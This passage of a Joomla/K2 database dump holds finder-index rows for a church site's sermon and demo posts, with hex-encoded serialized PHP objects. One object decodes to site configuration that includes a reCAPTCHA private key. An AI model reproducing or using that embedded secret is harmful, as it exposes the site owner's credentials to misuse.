3a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3432223b733a353a22726f757465223b733a34373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d34323a77656967686564223b733a353a227469746c65223b733a3130363a2254686f7365207468617420476f642057656967686564e280a620616e64204661696c6564202d204a7573742057656967687420283629202d205265762e323a312d32392c20333a312d32322c204a616d657320313a322d342c2031332d31352c20526f6d2e353a332d35223b733a31313a226465736372697074696f6e223b733a3138363a22205765e280997665206c6f6f6b656420617420766172696f7573207468696e677320756e64657220746865206a7573742077656967687420616e642077652070726f6365656420746f6461792c20746f207365652074686f7365207468617420476f64207765696768656420616e64206661696c656420616e642077656e7420696e746f207574746572206465737472756374696f6e2e202831292042454c54455348415a5a415220e280932044616e2e20353a32352d323720223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30342d31372031373a32383a3134223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30342d31372031373a32383a3134223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(250, 'index.php?option=com_k2&view=item&id=5', 'index.php?option=com_k2&view=item&id=5:music-is-food-for-the-soul', 'Music is food for the soul', ' [audio src=\"images/demo/audio/le_festin.mp3\" type=\"audio/mpeg\"][/audio] Perhaps travel cannot prevent bigotry, but by demonstrating that all peoples cry, laugh, eat, worry, and die, it can introduce the idea that if we try and understand each other, we may even become friends. Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek. ', '2017-06-25 14:19:29', 'd02c4556112b535c66b4518a96e706cb', 1, 0, 1, '*', '2014-07-26 00:00:00', '0000-00-00 00:00:00', '2014-07-26 00:00:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a313a2235223b733a353a22616c696173223b733a32363a226d757369632d69732d666f6f642d666f722d7468652d736f756c223b733a373a2273756d6d617279223b733a3635363a223c703e3c6272202f3e205b617564696f207372633d22696d616765732f64656d6f2f617564696f2f6c655f66657374696e2e6d70332220747970653d22617564696f2f6d706567225d5b2f617564696f5d3c2f703e0d0a3c7020636c6173733d2264726f70636170223e506572686170732074726176656c2063616e6e6f742070726576656e74206269676f7472792c206275742062792064656d6f6e7374726174696e67207468617420616c6c2070656f706c6573206372792c206c617567682c206561742c20776f7272792c20616e64206469652c2069742063616e20696e74726f6475636520746865206964656120746861742069662077652074727920616e6420756e6465727374616e642065616368206f746865722c207765206d6179206576656e206265636f6d6520667269656e64732e3c2f703e0d0a3c703e446f6e277420676f2061726f756e6420736179696e672074686520776f726c64206f77657320796f752061206c6976696e672e2054686520776f726c64206f77657320796f75206e6f7468696e672e2049742077617320686572652066697273742e20496620796f7520646f6e2774206c696b6520736f6d657468696e672c206368616e67652069742e20496620796f752063616e2774206368616e67652069742c206368616e676520796f75722061747469747564652e204368616e67652077696c6c206e6f7420636f6d65206966207765207761697420666f7220736f6d65206f7468657220706572736f6e206f7220736f6d65206f746865722074696d652e2057652061726520746865206f6e6573207765277665206265656e2077616974696e6720666f722e2057652061726520746865206368616e67652074686174207765207365656b2e3c2f703e0d0a223b733a343a22626f6479223b733a3736393a220d0a3c703e4974206973206e6f7420746865207374726f6e67657374206f6620746865207370656369657320746861742073757276697665732c206e6f7220746865206d6f737420696e74656c6c6967656e7420746861742073757276697665732e20497420697320746865206f6e65207468617420697320746865206d6f737420616461707461626c6520746f206368616e67652e20416c6c206368616e6765732c206576656e20746865206d6f7374206c6f6e67656420666f722c2068617665207468656972206d656c616e63686f6c793b20666f722077686174207765206c6561766520626568696e6420757320697320612070617274206f66206f757273656c7665733b207765206d7573742064696520746f206f6e65206c696665206265666f72652077652063616e20656e74657220616e6f746865722e3c2f703e0d0a3c703e5b626c6f636b71756f746520617574686f723d22756e6b6e6f776e225d2042656c6965766520696e20796f757273656c6621204861766520666169746820696e20796f7572206162696c69746965732120576974686f757420612068756d626c652062757420726561736f6e61626c6520636f6e666964656e636520696e20796f7572206f776e20706f7765727320796f752063616e6e6f74206265207375636365737366756c206f722068617070792e205b2f626c6f636b71756f74655d3c2f703e0d0a3c703e54616b65207570206f6e6520696465612e204d616b652074686174206f6e65206964656120796f7572206c696665202d207468696e6b206f662069742c20647265616d206f662069742c206c697665206f6e207468617420696465612e204c65742074686520627261696e2c206d7573636c65732c206e65727665732c2065766572792070617274206f6620796f757220626f64792c2062652066756c6c206f66207468617420696465612c20616e64206a757374206c65617665206576657279206f74686572206964656120616c6f6e652e2054686973206973207468652077617920746f20737563636573732e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031362d31322d33312031383a35343a3438223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2231223b733a353a227472617368223b733a313a2231223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a32383a22353a6d757369632d69732d666f6f642d666f722d7468652d736f756c223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a34363a22636f6d706f6e656e742f6b322f6974656d2f352d6d757369632d69732d666f6f642d666f722d7468652d736f756c223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d35223b733a353a22726f757465223b733a36353a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d353a6d757369632d69732d666f6f642d666f722d7468652d736f756c223b733a353a227469746c65223b733a32363a224d7573696320697320666f6f6420666f722074686520736f756c223b733a31313a226465736372697074696f6e223b733a3631303a22205b617564696f207372633d22696d616765732f64656d6f2f617564696f2f6c655f66657374696e2e6d70332220747970653d22617564696f2f6d706567225d5b2f617564696f5d20506572686170732074726176656c2063616e6e6f742070726576656e74206269676f7472792c206275742062792064656d6f6e7374726174696e67207468617420616c6c2070656f706c6573206372792c206c617567682c206561742c20776f7272792c20616e64206469652c2069742063616e20696e74726f6475636520746865206964656120746861742069662077652074727920616e6420756e6465727374616e642065616368206f746865722c207765206d6179206576656e206265636f6d6520667269656e64732e20446f6e277420676f2061726f756e6420736179696e672074686520776f726c64206f77657320796f752061206c6976696e672e2054686520776f726c64206f77657320796f75206e6f7468696e672e2049742077617320686572652066697273742e20496620796f7520646f6e2774206c696b6520736f6d657468696e672c206368616e67652069742e20496620796f752063616e2774206368616e67652069742c206368616e676520796f75722061747469747564652e204368616e67652077696c6c206e6f7420636f6d65206966207765207761697420666f7220736f6d65206f7468657220706572736f6e206f7220736f6d65206f746865722074696d652e2057652061726520746865206f6e6573207765277665206265656e2077616974696e6720666f722e2057652061726520746865206368616e67652074686174207765207365656b2e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a303b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031342d30372d32362030303a30303a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031342d30372d32362030303a30303a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(251, 'index.php?option=com_k2&view=item&id=6', 'index.php?option=com_k2&view=item&id=6:you-only-live-once-live-well', 'You only live once - Live well', ' [video width=\"100%\" height=\"420\" poster=\"images/demo/video/movie_bg.png\"] [source type=\"video/mp4\" url=\"images/demo/video/envato_sting.mp4\"][/source] [source type=\"video/ogg\" url=\"images/demo/video/envato_sting.ogv\"][/source] [source type=\"video/webm\" url=\"images/demo/video/envato_sting.webm\"][/source] [/video] Perhaps travel cannot prevent bigotry, but by demonstrating that all peoples cry, laugh, eat, worry, and die, it can introduce the idea that if we try and understand each other, we may even become friends. Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek. ', '2017-06-25 14:19:29', 